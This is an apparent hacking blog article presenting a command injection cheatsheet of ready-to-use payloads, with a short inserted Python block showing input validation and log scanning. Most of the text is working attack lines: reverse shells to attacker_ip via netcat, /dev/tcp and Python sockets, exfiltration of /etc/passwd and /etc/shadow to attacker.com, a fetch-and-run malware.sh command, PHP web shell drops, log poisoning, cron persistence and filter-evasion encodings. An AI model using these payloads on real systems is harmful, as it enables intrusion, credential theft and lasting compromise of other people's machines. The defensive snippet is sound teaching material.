Command Injection: Mastering Exploitation Techniques with a Comprehensive Cheatsheet


What is Command Injection?

Command Injection is a powerful attack vector where an attacker manipulates vulnerable applications to execute arbitrary system commands. When developers fail to properly handle user input, attackers gain the opportunity to exploit this oversight and directly interact with the underlying operating system. For hackers, this opens up a treasure trove of possibilities — from data exfiltration to full system compromise.

How Does Command Injection Work?

Command Injection occurs when user inputs are executed as part of system-level commands without proper validation. Here’s a typical example:

ping -c 4 $USER_INPUT

In this scenario, if $USER_INPUT isn't sanitized, an attacker can inject additional commands using separators such as ;, &&, or |. For instance:

$USER_INPUT="127.0.0.1; whoami"

This executes ping -c 4 127.0.0.1 followed by the whoami command, revealing the application's runtime user.
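As an added example (not code from the article), the vulnerable string-splicing pattern above sits next to its hardened form, and the same separators are checked for in web access logs. The log lines, the `host` parameter name and the `/ping` endpoint are constructed for the demonstration.

```python
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# Separators/substitutions the cheatsheet relies on: ; & | ` $( ${ and newline (%0A).
INJECTION_PATTERN = re.compile(r"[;&|`\n]|\$\(|\$\{")

def build_shell_command(user_input: str) -> str:
    """Vulnerable pattern from the article: input spliced into a shell string."""
    return f"ping -c 4 {user_input}"

def is_valid_host(user_input: str) -> bool:
    """Allow-list check: accept only a syntactically valid IP literal."""
    try:
        ipaddress.ip_address(user_input.strip())
        return True
    except ValueError:
        return False

def safe_ping_argv(user_input: str) -> list[str]:
    """Hardened pattern: the validated value is one argv element and the command
    runs without a shell, so ';', '&&', '|' and '$()' are never interpreted."""
    if not is_valid_host(user_input):
        raise ValueError(f"rejected host argument: {user_input!r}")
    return ["ping", "-c", "4", user_input.strip()]

def run_ping(user_input: str) -> int:
    return subprocess.run(safe_ping_argv(user_input), check=False).returncode

def suspicious_params(request_line: str) -> dict[str, str]:
    """Detection: URL-decode every query value of a logged request line and
    return the ones that carry shell metacharacters."""
    path = request_line.split()[1]
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    return {k: v for k, vs in params.items() for v in vs if INJECTION_PATTERN.search(v)}

# Constructed sample access-log lines (not from the article); %3B is ';', %0A a newline.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] "GET /ping?host=127.0.0.1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2025:10:00:01 +0000] "GET /ping?host=127.0.0.1%3B+whoami HTTP/1.1" 200 611',
    '10.0.0.9 - - [01/Jan/2025:10:00:02 +0000] "GET /ping?host=127.0.0.1%0Aid HTTP/1.1" 200 611',
]

def scan_log(lines: list[str]) -> list[tuple[str, dict[str, str]]]:
    """(client_ip, flagged_params) for each line whose query carries metacharacters."""
    hits = [(ln.split()[0], suspicious_params(ln.split('"')[1])) for ln in lines]
    return [(ip, flagged) for ip, flagged in hits if flagged]
```

A raw `&` already separates query parameters, so an injected `&&` only reaches the application when encoded as `%26%26`; `parse_qs` decodes it before the pattern check.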


Comprehensive Command Injection Cheatsheet

Here’s a collection of ready-to-use payloads for various Command Injection scenarios. Use these to exploit or test for vulnerabilities:

Basic Command Injection

; whoami
&& id
| uname -a
; cat /etc/passwd

File Manipulation

; echo "Hacked!" > /tmp/hacked.txt
&& rm -rf /tmp/hacked.txt
| touch /tmp/newfile

Reverse Shells

  • Netcat (Classic):
; nc -e /bin/bash attacker_ip 4444
  • Netcat (No -e flag):
; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc attacker_ip 4444 > /tmp/f
  • Bash Shell:
; bash -i >& /dev/tcp/attacker_ip/4444 0>&1

Data Exfiltration

  • Exfiltrate sensitive files via DNS:
; dig $(cat /etc/passwd).attacker.com
  • Send output to an attacker-controlled server:
; curl -X POST -d "$(cat /etc/shadow)" http://attacker.com/exfil

Bypassing Filters

  • Use backticks:
`whoami`
  • Use $():
$(id)
  • Use URL encoding (e.g., encode ; as %3B):
%3Bid

Blind Injection (Time-Based)

  • Test for blind injection:
; sleep 10
  • Trigger a delayed ping:
; ping -c 10 localhost

Spawning Shells

  • Spawn an interactive shell:
; /bin/bash ; /bin/sh

Command Chaining

  • Combine commands to escalate the attack:
; wget http://attacker.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh
  • Execute multiple commands in sequence:
; id && pwd && ls

Network Exploits

  • Scan for open ports:
; nmap -p 1-65535 localhost
  • Trigger an outbound connection:
; curl http://attacker.com

Environment Exploration

  • Enumerate environment variables:
; env
  • Check OS version:
; uname -a

Privilege Escalation

  • Check sudo privileges:
; sudo -l
  • Exploit sudo misconfigurations:
; sudo /usr/bin/vulnerable_binary

Web Shell Uploads

  • Upload a PHP web shell:
; echo "<?php system($_GET['cmd']); ?>" > /var/www/html/shell.php
  • Upload a Python reverse shell:
; echo 'import socket,os,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker_ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /tmp/shell.py

Fuzzing for Blind Injection

  • Inject characters to provoke errors or behavior changes:
; ' " | ` $() || &&
  • Inject common payloads:
; ls && pwd | whoami

Advanced Command Injection Techniques

1. Command Obfuscation

Obfuscate payloads to bypass basic filters. Example using hexadecimal encoding for cat:

; echo -e '\x63\x61\x74 /etc/passwd'

2. Log Poisoning

Poison logs to execute commands later. Example:

; echo '<?php system($_GET["cmd"]); ?>' >> /var/log/apache2/access.log

3. Exploiting Cron Jobs

Inject malicious scripts into directories monitored by cron jobs. Example:

; echo 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1' > /tmp/malicious.sh

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2nd if 1st finishes ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2nd
ls %0A id # %0A Execute both (RECOMMENDED)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

Command Injection is a playground for hackers, offering unlimited opportunities for exploitation, privilege escalation, and system compromise. The key to mastering this vulnerability lies in understanding the subtle variations and crafting payloads tailored to each scenario. Whether you’re targeting IoT devices, web servers, or cron jobs, this cheatsheet equips you with a robust arsenal of commands to test and exploit vulnerable systems.
